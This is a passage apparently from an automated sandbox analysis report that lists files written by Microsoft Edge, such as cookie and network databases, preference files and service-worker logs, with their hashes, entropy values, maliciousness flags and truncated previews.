SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.777905486915419
Encrypted:	false
SSDEEP:	192:tTiGGnJVgfg1BpOjUKgCt98oOp16Xcf0L/ZJVb:ViGGncfQpOltCMXI0LhJVb
MD5:	340B972EDE6498ACD9FFBD617AF59A2D
SHA1:	606B139629BD3E485CF95AF7487A8FA09D1EBE63
SHA-256:	DD7A0BE5C79E87DDE650F873007DD6F40E38DB93C28E8204859D1D09EB1C64E9
SHA-512:	68C94A8B2AA5C2D952C4D93A247384825ED21170657CB3D54A9A7344E363F5385A822AA465FE01E5AFC2AE65391C488D663311679B4A8F47739A46FB51697B61
Malicious:	true
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1419
Entropy (8bit):	5.336394944460292
Encrypted:	false
SSDEEP:	24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7nbI+:YXs/tsbfc7leeEscgCgakhYhbxo+
MD5:	BF6BA1797785A5763A0088569A24FE85
SHA1:	62B9D7386B7BDD97B816063ED0D9CC0D912EB130
SHA-256:	40C6B39ED9B1E473CBD7027290D7996D15139F0B5BDC4BA6769E8FE8467BBA4E
SHA-512:	FE46026F5F2C16522DBA26D256C0831DA94254C432E5C2CC77F864E6D7E0F1D9C66A50726AF91B06D54EC124C21D1C73744CB2D9CC016BD9FE7200823698D729
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.3220225481156824
Encrypted:	false
SSDEEP:	48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB9u:JkIEumQv8m1ccnvS6BptaD62R9zXcyv
MD5:	E77695891103CBE9ECDD4B0FCA923E05
SHA1:	4C907644D398EEF451C9AC52104AE8F85FF2F54D
SHA-256:	43FBF5845F601EB810357E568D4F3E6ECA57E0ECEE528556C323F10D6E71F136
SHA-512:	4FD93C2343806D86E8D4EC22DCEF0F2DB87624622F5D66A84240273E952001C189E26E03B97D8DF3EB07031C76B198CE221AD214BFF1CFFB9482B2FAC34598EB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF37139.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF380aa.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF38cb1.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF44080.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries~RF46742.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a8a60776-9b51-455e-af67-d185e5126c6c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\b97d0086-4375-4678-9038-82718ae9c1f3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ce6c3842-c66c-4d38-8b6d-8584b08da139.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\de9fd620-c1c2-4cf0-9d63-aff2c2d5e71d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8350301952073809
Encrypted:	false
SSDEEP:	24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
MD5:	0DAD8D7F079797377CD56DAE47E1A619
SHA1:	A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
SHA-256:	7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
SHA-512:	5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (14063), with no line terminators
Category:	dropped
Size (bytes):	14065
Entropy (8bit):	5.420852236169281
Encrypted:	false
SSDEEP:	384:stWQrsMiqfhu2sW9cLpbGM4Qwb6WYdaTY4:scciqfs89c1bGMHIkdaTY4
MD5:	D4C812B5E0FA2BC4A591964AA97F7076
SHA1:	B9F0AD089A9547440042453530B5698ED1CCDB28
SHA-256:	39562202AB27BF20C8A4A38E2BACCD55D9854BE1F25173E2A27FDB7F2E2AE50A
SHA-512:	14261667A5DB366BAF5C07EA650475C8C9C866BAED79852C60D390C682BEA47A3960DF5F4500B4D089683495D81E6CBCB66E832C3D7E8D107C28B0A9199B4369
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375791195543194","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3aa89.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (14063), with no line terminators
Category:	dropped
Size (bytes):	14065
Entropy (8bit):	5.420852236169281
Encrypted:	false
SSDEEP:	384:stWQrsMiqfhu2sW9cLpbGM4Qwb6WYdaTY4:scciqfs89c1bGMHIkdaTY4
MD5:	D4C812B5E0FA2BC4A591964AA97F7076
SHA1:	B9F0AD089A9547440042453530B5698ED1CCDB28
SHA-256:	39562202AB27BF20C8A4A38E2BACCD55D9854BE1F25173E2A27FDB7F2E2AE50A
SHA-512:	14261667A5DB366BAF5C07EA650475C8C9C866BAED79852C60D390C682BEA47A3960DF5F4500B4D089683495D81E6CBCB66E832C3D7E8D107C28B0A9199B4369
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375791195543194","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3f771.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (14063), with no line terminators
Category:	dropped
Size (bytes):	14065
Entropy (8bit):	5.420852236169281
Encrypted:	false
SSDEEP:	384:stWQrsMiqfhu2sW9cLpbGM4Qwb6WYdaTY4:scciqfs89c1bGMHIkdaTY4
MD5:	D4C812B5E0FA2BC4A591964AA97F7076
SHA1:	B9F0AD089A9547440042453530B5698ED1CCDB28
SHA-256:	39562202AB27BF20C8A4A38E2BACCD55D9854BE1F25173E2A27FDB7F2E2AE50A
SHA-512:	14261667A5DB366BAF5C07EA650475C8C9C866BAED79852C60D390C682BEA47A3960DF5F4500B4D089683495D81E6CBCB66E832C3D7E8D107C28B0A9199B4369
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375791195543194","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF46c91.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (14063), with no line terminators
Category:	dropped
Size (bytes):	14065
Entropy (8bit):	5.420852236169281
Encrypted:	false
SSDEEP:	384:stWQrsMiqfhu2sW9cLpbGM4Qwb6WYdaTY4:scciqfs89c1bGMHIkdaTY4
MD5:	D4C812B5E0FA2BC4A591964AA97F7076
SHA1:	B9F0AD089A9547440042453530B5698ED1CCDB28
SHA-256:	39562202AB27BF20C8A4A38E2BACCD55D9854BE1F25173E2A27FDB7F2E2AE50A
SHA-512:	14261667A5DB366BAF5C07EA650475C8C9C866BAED79852C60D390C682BEA47A3960DF5F4500B4D089683495D81E6CBCB66E832C3D7E8D107C28B0A9199B4369
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375791195543194","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	26889
Entropy (8bit):	5.57698422548858
Encrypted:	false
SSDEEP:	768:bRz+P1WP4+fqt8F1+UoAYDCx9Tuqh0VfUC9xbog/OVev2Mn8srwb7KpKtur:bRz+P1WP4+fqtu1jaXv2E8Fbjtg
MD5:	AFFA2D7DC51F98FD9D383F0A415BD0B2
SHA1:	C4F63CB77C36411D540AD2AFE963B65B10A28931
SHA-256:	2859B8557A7FE7127570A87D5E3CE9980371609361A374A67ECA2A1DB1B4715F
SHA-512:	FACD76CE181EF8330E5F26C0466D846A84B6D6B01DD59D83389B1421EEAD5405F6BB048E6AC8B187F364ED981902191EC10E6A19BE30E87993CB36D4CC923353
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375791195057337","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375791195057337","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3ac2f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	26889
Entropy (8bit):	5.57698422548858
Encrypted:	false
SSDEEP:	768:bRz+P1WP4+fqt8F1+UoAYDCx9Tuqh0VfUC9xbog/OVev2Mn8srwb7KpKtur:bRz+P1WP4+fqtu1jaXv2E8Fbjtg
MD5:	AFFA2D7DC51F98FD9D383F0A415BD0B2
SHA1:	C4F63CB77C36411D540AD2AFE963B65B10A28931
SHA-256:	2859B8557A7FE7127570A87D5E3CE9980371609361A374A67ECA2A1DB1B4715F
SHA-512:	FACD76CE181EF8330E5F26C0466D846A84B6D6B01DD59D83389B1421EEAD5405F6BB048E6AC8B187F364ED981902191EC10E6A19BE30E87993CB36D4CC923353
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375791195057337","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375791195057337","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2294
Entropy (8bit):	5.828628291423169
Encrypted:	false
SSDEEP:	24:F2xc5Nmygcncmo0CRORpllg2D7SfRHxsVdCRORpllg2Zt/QKCRORpllg2D7tRHx7:F2emyxtrdDWfB4XrdZBvrdD5B+rd+BN
MD5:	A3A164C0554B5AA76A17C2D85AA020FE
SHA1:	A654D07CA6085ED722F950C10C949970C496D96C
SHA-256:	47B393C86413C12ED5FE844EC4250828EC0B7B43D7C767A3B0872CDCF77898BD
SHA-512:	8BAECBD518443AB2EC38D77BEA341C0BCD5FB36094A1AE00C815279E8D6F9A1EC0C143B754A3EAC47CAB2CF9B14CAE0BD96C780DD34C931313B9E6DC675DF430
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.@..m................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enable

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299
Entropy (8bit):	5.181340931644713
Encrypted:	false
SSDEEP:	6:HUzLmFB1923oH+TcwtE/a252KLlVUzLmb3+q2P923oH+TcwtE/a2ZIFUv:+imYeb8xL2iCv4Yeb8J2FUv
MD5:	F6E03BF113030B44F672B49457B01BEF
SHA1:	5C3EEE34E398E032501E10E5AB633AFA80AF9A72
SHA-256:	D264C0CCD703B517EB5AB597E4B9ED176C0EEC35986E2CD69E15534393175D77
SHA-512:	F16831ABE7FBA953F68F9B46636F6BE02A848148D9D13B535BA78405A0DB638591D9AAC35C49C27895BA1DA8D293AE0FC78E737DD64BE91EBFE117FA91A55CB1
Malicious:	false
